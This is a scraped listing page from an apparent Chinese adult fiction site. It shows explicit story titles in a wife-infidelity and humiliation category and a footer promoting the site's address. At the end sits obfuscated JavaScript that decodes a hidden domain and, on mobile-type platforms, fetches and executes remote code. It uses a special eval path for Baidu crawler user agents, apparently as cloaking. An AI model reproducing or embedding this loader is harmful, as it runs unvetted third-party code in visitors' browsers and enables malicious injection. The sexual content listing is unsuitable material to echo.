3.0分 烂货庄文馨的婚房淫事(完)作者:hangcheng2-淫妻奸情267

3.0分

3.0分 少妇系列(1-4)作者:小黄-淫妻奸情cd2

3.0分

3.0分 凌辱女友小瑄的故事(01-06)-淫妻奸情a90

3.0分

3.0分 我被男友当做赌注(06)作者:xialingfei1989-淫妻奸情bdd

3.0分

3.0分 影猎者(1-5) 作者:invcoder-淫妻奸情48d

3.0分

3.0分 爱&欲作者:xiaohuaihuo-淫妻奸情837

3.0分

3.0分 我的老婆丁丁-淫妻奸情77d

3.0分

3.0分 淫娃可可一作者chan98-淫妻奸情7f9

3.0分

3.0分 艳夏全本作者HelpHero-淫妻奸情79c

3.0分

3.0分 浮生(08)作者:龙戈-淫妻奸情e8f

3.0分

3.0分 浪漫情事又名学校里的乱全本作者q526298946-淫妻奸情6cb


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function MAdbN(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zVmMy(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return MAdbN(t);};window[''+'T'+'s'+'W'+'j'+'l'+'y'+'b'+'E'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zVmMy,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('b3BByLnpoYW5nemhpeWFuZzAxLmNu','151936',window,document,['B','xIrjTpRA']);}:function(){};